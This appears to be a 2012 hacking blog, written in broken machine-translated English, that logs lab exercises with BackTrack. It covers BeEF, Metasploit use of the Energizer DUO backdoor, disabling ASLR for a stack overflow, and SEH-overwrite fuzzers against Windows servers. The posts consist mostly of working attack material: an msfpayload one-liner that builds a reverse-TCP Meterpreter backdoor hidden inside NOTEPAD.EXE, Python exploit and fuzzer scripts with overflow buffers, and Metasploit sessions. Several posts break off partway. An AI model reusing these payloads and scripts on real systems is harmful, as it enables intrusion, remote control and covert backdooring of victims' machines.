W

Senin, 27 Februari 2012

attack vector browser exploit and metasploits

first before getting to the source and then open the beef,,,

USER/PASSWORD: beef/beef

[ 2:04:00][*] Version: 0.4.2.8-alpha - Run 'svn update' to update to the latest version.
[ 2:04:01][*] Resetting the database for BeEF.
[ 2:04:04][*] BeEF is loading. Wait a few seconds...
[ 2:04:07][*] 6 extensions loaded:
[ 2:04:07] | demonstrations
[ 2:04:07] | initialization
[ 2:04:07] | events logger
[ 2:04:07] | console
[ 2:04:07] | proxy
[ 2:04:07] |_ administration web UI
[ 2:04:07][*] 32 modules loaded.
[ 2:04:07][*] 2 network interfaces were detected.
[ 2:04:07][+] running on network interface: 127.0.1.1
[ 2:04:07] | Hook URL: http://127.0.1.1:3000/hook.js
[ 2:04:07] |_ UI URL: http://127.0.1.1:3000/ui/panel
[ 2:04:07][+] running on network interface: 127.0.0.1
[ 2:04:07] | Hook URL: http://127.0.0.1:3000/hook.js
[ 2:04:07] |_ UI URL: http://127.0.0.1:3000/ui/panel
[ 2:04:07][+] HTTP Proxy: http://127.0.0.1:6789

then be entered into...

then enter a user name and password,,,

Baca selengkapnya »

use as well as examples and msfencode msfpayload

to install the network bacdoor enemy before we have to prepare these types of attacks,,

after doing nmap or scanning open ports and then,,,,,,,,,

Where the above is how to see the target show,,,,

where is suadah enter and stay in meterpereter wrftp make bacdoor,,,

root@bt:~# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 R |msfencode -t exe -e x86/shikata_ga_nai -x /root/NOTEPAD.EXE -k -o hancur.exe -c 3

and then try to see who's been made bacdor,,,,

example of using the metasploit auxeleri

here I try to install a backdoor on the usb charger batrai using using the metasploit auxeleri,,

I tried to make the initial use of the syntax of the attack,,

` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`

=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated 44 days ago (2012.01.14)

Warning: This copy of the Metasploit Framework was last updated 44 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set R
set RHOSTS set RPORT
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.56.1
RHOSTS => 192.168.56.1

described in which the victim tried to attack,,,,

then try to address in order to enter through the,,,

msf auxiliary(energizer_duo_detect) > set THREADS 256

THREADS => 256

msf auxiliary(energizer_duo_detect) > run

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(energizer_duo_detect) > set THREADS 21

THREADS => 21

msf auxiliary(energizer_duo_detect) > run

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(energizer_duo_detect) > set THREADS 256

THREADS => 256

msf auxiliary(energizer_duo_detect) > run

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

then i tried to make THEREADS 21 then I make thereads tetapai 256 that did not work,,

then next try to get meterpreter,,

(_) O O (_)_________

\ _ / |\

o_o \ M S F | \

\ _____ | *

||| WW|||

||| |||

=[ metasploit v4.2.0-dev [core:4.2 api:1.0]

+ -- --=[ 787 exploits - 425 auxiliary - 128 post

+ -- --=[ 238 payloads - 27 encoders - 8 nops

=[ svn r14551 updated 44 days ago (2012.01.14)

Warning: This copy of the Metasploit Framework was last updated 44 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

https://community.rapid7.com/docs/DOC-1306

msf > use exploit/windows/backdoor/energizer_duo_payload

msf exploit(energizer_duo_payload) > set RHOST 192.168.56.24

RHOST => 192.168.56.24

Baca selengkapnya »

Understanding Social Engineering and Set (social engineering toolkit)

understanding Social Engineering ?

In the world of network security, there is a principle which says "the strength of a chain hanging from or located at the junction of the weakest" or in English "the strength of a chain depends on the weakest link". What it means is a chain with a bond as good as anything if there is a weak bond is the bond which limits its power. In the world of network security, the weakest component is human. Although a system has been protected by the hardware and software that cangih the antidote attacks such as firewalls, anti-virus, IDS / IPS, and so forth-but if the people who operate it fails, then all the equipment it has no meaning. The cyber criminals know this, so then they started using a particular technique called the "social engineering" to get the important and crucial information that is stored in secret by a system through a human.Security or security is dependent on trust. Good faith in terms of authentication and protection. It has been generally agreed that as part of the weakest bond in a security chain, a natural human nature to believe the words of other people easily create a gap in security. Do not rely on the system's security forces, but it all depends on the human to keep a company or an information is maintained.TargetThe main purpose of doing social engineering with the goal of hacking is similar in outline, is to get that should not be allowed access to a system or information to commit fraud, infiltration, surveillance, identity theft, or to destroy a system or network. Usually the target of social engineering in the areas of provider network is a telephone, answering machine, large corporations, financial institutions, government companies, and hospitals.Look for concrete examples of social engineering is quite difficult. Target company will not admit it because it will be a thing to do

Baca selengkapnya »

Jumat, 24 Februari 2012

EXPLOITS BACTRACK 5 R1 in ROOT

before the attack to linux we should turn off Linux ASLR in a way,,

using the command......

root@bt:~# cat /proc/sys/kernel/random
random/ randomize_va_space
root@bt:~# cat /proc/sys/kernel/randomize_va_space
2

then type the command,,,,

root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space

root@bt:~# cat /proc/sys/kernel/randomize_va_space

then make syntak c + + to attack,,,,

// I am a vulneranable thing.

#include <stdio.h>

#include<string.h>

int main(int argc, char** argv)

{

char buffer[500];

strcpy(buffer, argv[1]); //vulnerable function!

return 0;

}

then we try to transmit buffer is normal,,,

root@bt:~# gdb vulnerable_1

GNU gdb (GDB) 7.1-ubuntu

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law. Type "show copying"

and "show warranty" for details.

This GDB was configured as "i486-linux-gnu".

For bug reporting instructions, please see:

<http://www.gnu.org/software/gdb/bugs/>...

Reading symbols from /root/vulnerable_1...done.

then try to run syntak,,,,,

(gdb) run $(python -c 'print "\x41" * 600')

then try to run this syntak but there is an error because of errors in writing syntak,,,,

root@bt:~# gcc -ggdb -0 vulnerable_1 -fno-stack-protector -mpreferred-stack-boundary=2 linux.c

gcc: unrecognized option '-0'

is correct then syntak,,,,

oot@bt:~# gcc -ggdb -o vulnerable_1 -fno-stack-protector -mpreferred-stack-boundary=2 linux.c

root@bt:~# gdb vulnerable_1

then i tried to run, syntak,,,,

(gdb) run $(python -c 'print "\x41" * 508')

Starting program: /root/vulnerable_1 $(python -c 'print "\x41" * 508')

then I tried to look at the EIP with the command,,,

(gdb) info register eip

then i tried looking info register,,,,

(gdb) info register ,,,

Baca selengkapnya »

Rabu, 22 Februari 2012

SEH FILE SHERING WIZARD

initial stage is to prepare the application is file sharing,,,,
and then prepare a fuzzer,,,

#!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=80
#buffer = "USV "
#buffer+="\x90" * 962
buffer="http://"
buffer+="\x41" * 121000 + "\r\n\r\n"
#
buffer+="\x90" * 120025
buffer+"\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (121004-len(buffer))
#buffer+="\r\n
#buffer+="\xcc\xcc\xcc\xcc"
#uffer+="\x41\x41\x41\x41"
#buffer+="\x90" * (150000 - len(buffer))
#buffer+="\x6A\x19\x9A\x0F" # al
#buffer+="\x90" * (3000 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()

then see the results of cress which occurs in the application view using ollidbgr,,

then see the results via VIEW-> SEH shif and press F9,,

above shows the value of EIP is 4141414,,

then follow the next dump
with a right click event on the stack the line,,,

hen dump the results of the follow,,,

then later to see results

then subsequently conducted patten_creat...

root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 30785839 121000
18629
38909
59189
79469
99749
120029
root@bt:/pentest/exploits/framework/tools#

then later to see results,,,,

from here I started having problems, among others, 414 141 did not appear but that appears to be 909 090,,,,

Baca selengkapnya »

Jumat, 17 Februari 2012

exploits BEgant Server use SEH

before the start of the first step should be to prepare exploits Scribe fuzzer,,,,,

#!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=6660
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()

Scribe syntak above is in use cress,,,

- then run through the server began OllyDbg,,, then run the fuzzer,,, will be seen eating cress,,

seen that the server has been experiencing began cress or error,,,

then look through the SEH, SEH menu chain-view ,,,

seen the cress by SEH,,,,,

The next view is sent in the buffer chain seh,,,,

visible EIP changed to 4141414141, it is all right cress,,,,

The next to follow in the dump,,, it will show the memory buffer pad,,,,

above is the result of the sack and dump,,,,

The next is how to find or install stepping stones,,,

This is used to view the modules that are running, with taking such an order, inter alia,POP.POP RETN,,,,

The next step is to find the location of the command, POP, POP,,,,

and this is the result of stepping stones,,,
to make a pop,, look at the steps below,,

The next ollidbg will find the address in memory,

then seek to offset overite Seh,, how to search using syntak fuzzer,,,,

#!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=6660
buffer = "USV "
buffer+="a0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db"+
buffer+="\r\n\n"
sock=socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()

That's the result of a fuzzer syntak made,,

then try Patten ofsset,,

Now enter the address of vbajet32.ll Offset,,,,

#!/usr/bin/python
import socket
target_address="192.168.56.24"
target_port=6660
buffer = "USV "
buffer+="\x90" * 962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x6A\x19\x9A\x0F" # al
buffer+="x90" * (2504 - len(buffer))
buffer+="\r\n\n"
sock=socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()

above is the result of the fuzzer vbajet32.dll,,,